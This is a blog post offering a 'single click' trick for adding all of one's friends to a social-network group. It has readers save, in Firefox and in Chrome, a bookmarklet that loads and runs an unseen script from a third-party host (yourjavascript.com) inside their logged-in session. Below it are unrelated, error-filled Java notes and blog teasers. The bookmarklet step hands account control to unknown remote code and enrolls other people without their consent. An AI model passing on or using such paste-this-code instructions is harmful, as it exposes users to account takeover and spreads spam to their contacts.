Skip to main content

How to Add all frnds in a group with a single click..Mozilla firefox tricks

How to Add all frnds in a group with a single click..

1) FOR MOZILLA FIREFOX USERS :

Make Sure you are using Firefox browser.
If U don't have Firefox Browser then please download it from

http://www.mozilla.org/en-US/products/download.html

Now go onto the top left hand side of Browser then click of Firefox --> Bookmark --> Right click --> Then click on new Bookmark.
In the New Bookmark Window put Name as " ADD " and paste this Javascript in Location and click on ADD.

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/8714201912/Add.js';})();

Now go the Group Page and click on that Bookmark which u made and wait for a minute then automatically ur all friends will be added in a group.

2) FOR GOOGLE CHROME USERS :

Make sure you are using Chrome browser.
If U don't have chrome Browser then please Download it from

https://www.google.com/chrome/

Now Goto Bookmark --> Bookmark Manager --> Right Click On Bookmark Bar --> Click On Add Page --> Put Name as " ADD " and Paste this javascript in URL

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/8714201912/Add.js';})();

Press Ctrl+Shift+B Button On Keyboard to make Bookmark Bar Visible.
Now Goto the group Page and click on that Bookmark which U made and wait for a minute then automatically ur all friends will be added in a group.




JVM --- Java Virtual Mahine
JDK --- Java Development Kit
JIT ---Just Intime Compiler
JRE --- Java Runtime Ecvironment
The main difference between JRE and JDK is that JRE creates an environment that is responsible for the execution of your Java Applets and Applications while JDK provides all the necessary tools that a Java programmer needs to develop his/her software/application. A Java Compiler (javac) comes along with the JDK .
java is an independent of platform why because the JRE includes the JVM which is built along with OS. So the JVM is different for different os......
first the programme is created and compiled by javac and the it will be interpeted through jvm !!!!

Comments

Popular posts from this blog

Ten Important Rules Of Ethical Hacking

The world of ethical hacking too is bound by a set of rules and principles, here are 10 crucial ones!   Time and again we have been bringing you valuable resources on ethical hacking since we know and understand the nature of things as far as security goes. Ethical hacking is picking up steam each day with more and more organisations spending heftily to maintain the sanctity of their systems and data. As such, ethical hacking is a glorious career option in the current scheme of things. 1.Set your goals straight To begin with, an ethical hacker must start thinking like the intruder. He must be able to identify the loopholes on the target access points or networks that are prone to attack, he must be aware of the repercussions of these loopholes and how the intruder can use it against the same. An ethical hacker then has to find out if anyone at the target notice the intruder's attempts to carry out his/her acts. Finding out and eliminating unauthorised wireless access point...

Here Are 7 Brilliant Cheat Sheets For Linux/Unix

There's nothing better than a cheatsheet when you are stuck and need a reference. So here bringing to you 7 brilliant free cheat sheets.  1. Unix Tool Box : An incredibly exhaustive reference for all things Linux. This document is a collection of Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users. 2. One page Linux Manual : Great one page reference to the most popular Linux commands, it is a summary of useful Linux commands. 3. Linux Reference Card : One great reference published by FOSSwire. 4. Linux Command Line Cheat Sheet : This is an interestingly sorted and helpful cheat sheet by cheatography. 5. Linux Command Line Tips : This is a linux command line reference for common operations. Cleanly sorted and well described. 6. Treebeard’s Unix Cheat Sheet : A great reference that shows command comparisons with that of DOS. So if you are someone who was a DOS user and has switched to Linux, this is the best one too have! 7. Linux Shor...

10 Online Courses To Learn Artificial Intelligence!

Remember movies like AI, Terminator and I Robot? Want to build such machines of your own? Take these courses, keep at it and you just might get there!    Artificial Intelligence is one of the most interesting fields available to any technology oriented mind. This amalgamation of robotics, computer science, electronics and other things, is aimed at building a superior robot (or an organism) that can think and function at par with humans. The subject is not only fascinating, it also includes very advanced technology. Here are 10 online courses that will make learning about AI a little simpler for you. Some of these offer certifications for free too! 1. Artificial Intelligence 2. Einführung in Computer Vision (Coursera) 3. Discrete Inference and Learning in Artificial Vision (Coursera) 4. Advanced Artificial Intelligence (saylor.org) 5. Machine Learning (Caltech) 6. Introduction to Artificial Intelligence (Udacity) 7. Artifi...